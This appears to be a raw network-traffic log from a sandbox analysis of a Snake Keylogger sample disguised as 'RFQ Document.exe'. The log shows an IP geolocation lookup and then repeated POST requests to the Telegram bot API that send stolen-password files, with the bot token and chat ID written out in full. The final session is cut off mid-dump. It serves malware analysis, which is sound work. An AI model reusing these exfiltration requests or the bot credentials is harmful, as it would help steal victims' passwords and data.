
                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            99192.168.2.449875149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.449774172.67.188.154443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:08 UTC0OUTGET /xml/84.17.52.39 HTTP/1.1
                                            Host: freegeoip.app
                                            Connection: Keep-Alive
                                            2021-09-28 05:58:08 UTC0INHTTP/1.1 200 OK
                                            Date: Tue, 28 Sep 2021 05:58:08 GMT
                                            Content-Type: application/xml
                                            Content-Length: 345
                                            Connection: close
                                            vary: Origin
                                            x-database-date: Wed, 25 Aug 2021 10:15:20 GMT
                                            x-ratelimit-limit: 15000
                                            x-ratelimit-remaining: 14994
                                            x-ratelimit-reset: 3175
                                            CF-Cache-Status: DYNAMIC
                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ce3pmuYF%2B1OsN99Wh3feRT8VZEtjruEOuOfR783o9QV3CkTYoSWaqFLt4qn4hSFHq3WkEwOQqPf05E2yDnczYRyzqnOpyLB72qzs35zdKEFTp75NMuijfLoXF9mMZyS2"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 695abcfe0a2c6931-FRA
                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                            2021-09-28 05:58:08 UTC0INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 34 2e 31 37 2e 35 32 2e 33 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 48 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 53 77 69 74 7a 65 72 6c 61 6e 64 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 5a 48 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 5a 75 72 69 63 68 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 5a 75 72 69 63 68 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 31 35 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74
                                            Data Ascii: <Response><IP>84.17.52.39</IP><CountryCode>CH</CountryCode><CountryName>Switzerland</CountryName><RegionCode>ZH</RegionCode><RegionName>Zurich</RegionName><City>Zurich</City><ZipCode>8152</ZipCode><TimeZone>Europe/Zurich</TimeZone><Latit


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.449775149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:09 UTC1OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255b68d7103
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            Connection: Keep-Alive
                                            2021-09-28 05:58:09 UTC1OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 62 36 38 64 37 31 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255b68d7103Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:09 UTC1INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:09 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:09 UTC2INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 36 38 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12578,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808689,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            10192.168.2.449784149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:22 UTC15OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c309ad23
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:22 UTC16OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 30 39 61 64 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c309ad23Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:22 UTC16INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:22 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:22 UTC16INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12589,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808702,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            100192.168.2.449876149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:42 UTC160OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ceee4404
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:42 UTC160OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 65 65 65 34 34 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ceee4404Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:42 UTC160INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:42 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:42 UTC161INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12683,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808722,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            101192.168.2.449877149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:42 UTC161OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cf146a4e
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:42 UTC162OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 31 34 36 61 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cf146a4eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:42 UTC162INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:42 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:42 UTC162INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12684,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808722,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            102192.168.2.449878149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:43 UTC163OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cf29df91
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:43 UTC163OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 32 39 64 66 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cf29df91Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:43 UTC164INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:43 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:43 UTC164INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12685,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808723,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            103192.168.2.449879149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:43 UTC164OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cf48dd2b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:43 UTC165OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 34 38 64 64 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cf48dd2bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:43 UTC165INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:43 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:43 UTC166INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12686,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808723,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            104192.168.2.449880149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:43 UTC166OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cf67dbc5
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:43 UTC166OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 66 36 37 64 62 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
